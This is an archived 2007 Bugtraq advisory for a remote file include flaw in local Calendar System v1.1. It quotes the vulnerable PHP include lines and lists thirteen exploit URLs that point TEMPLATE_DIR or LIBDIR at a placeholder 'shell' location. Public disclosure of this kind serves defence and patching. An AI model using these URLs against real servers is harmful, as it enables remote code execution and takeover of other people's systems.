lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20070127174655.27269.qmail@securityfocus.com>
Date: 27 Jan 2007 17:46:55 -0000
From: trzindan@...mail.fr
To: bugtraq@...urityfocus.com
Subject: local Calendar System v1.1 (lcStdLib.inc) Remote File Include

+-------------------------------------------------------------------------------------------
local Calendar System v1.1 (lcStdLib.inc) Remote File Include

Tr_ZiNDaN

trzindan@...mail.fr Turkey
--------------------------------------------------------------------------------------------
download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz
--------------------------------------------------------------------------------------------

code :
require "$TEMPLATE_DIR/header.inc";
require("$LIBDIR/lcStdLib.inc");
require("$LIBDIR/lcUser.php");
require ("$LIBDIR/lcGroup.inc");
require("$LIBDIR/lcCal.inc");
require("$LIBDIR/Calendar.inc");
require("$LIBDIR/lcErrorChecker.inc");
include ("$TEMPLATE_DIR/navbar.php");
include("$TEMPLATE_DIR/footer.inc");
--------------------------------------------------------------------------------------------
exploit:

local/showinvoices.php?TEMPLATE_DIR=shell?
local/editevent.php?LIBDIR=shell?
local/resetpassword.php?LIBDIR=shell?
local/signup.php?LIBDIR=shell?
local/showmonth.php?TEMPLATE_DIR=shell?
local/showmonth.php?LIBDIR=shell?
local/showday.php?LIBDIR=shell?
local/showevents.php?LIBDIR=shell?
local/showevents.php?TEMPLATE_DIR=shell?
local/retrieveinvoice.php?TEMPLATE_DIR=shell?
local/modifyitem.php?TEMPLATE_DIR=shell?
local/lookup_userid.php?LIBDIR=shell?
local/lookup_userid.php?TEMPLATE_DIR=shell?

--------------------------------------------------------------------------
Thanx

str0ke,EL_MuHaMMeD,Crackers_Child,H0tturk,EntriKa,XYU,E-system,RedWorm
Blackwolf,Mefisto,M3rhametsiz,Paradox_,Sehzade,Volqan,Arslan,KurtEfendy.. 


-------------------------------------------------------------------------

##---ALL MusLim Hackers------------------------------------------------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ